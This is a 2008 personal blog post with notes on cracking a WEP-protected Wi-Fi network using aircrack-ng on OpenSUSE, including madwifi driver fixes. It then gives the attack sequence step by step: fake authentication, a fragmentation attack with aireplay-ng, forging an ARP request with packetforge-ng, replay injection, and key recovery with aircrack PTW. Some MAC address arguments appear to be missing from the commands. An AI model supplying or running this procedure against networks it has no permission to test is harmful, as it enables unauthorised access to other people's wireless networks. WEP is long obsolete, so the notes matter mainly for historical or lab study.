Thursday, November 6, 2008

Cracking WEP protected wireless network

http://www.aircrack-ng.org/doku.php?id=simple_wep_crack
Installation notes on OpenSUSE 10.3:
#Wireless card Atheros AR2413 chipset
#install c/c++ and source pkg
#compile and install madwifi 0.9.4
During install if can not stop ath0 and get error:
FATAL: Module wlan_wep is in use.
FATAL: Module wlan_scan_sta is in use.
FATAL: Module wlan is in use
Do following:
sudo rmmod ath_pci
sudo rmmod ath_rate_sample
sudo rmmod wlan_scan_sta
sudo rmmod wlan_wep
sudo rmmod wlan
#madwifi driver patch r3386 does not work, use r2277
# if no client associated with target AP, type 1 attack will not wok (get 0 ARP requests), use fragmentation attack instead:
After fake auth step do:
aireplay-ng -5 -b -h
This will create the xor file for next step.
packetforge-ng -0 -a -h -k 255.255.255.255 -l 255.255.255.255 -y -w
arp-request
This creates an ARP request to be used with aireplay:
aireplay-ng -2 -r arp-request
#use kismet to get client list, c key
#use aircrack PTW to find key.
Posted by at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)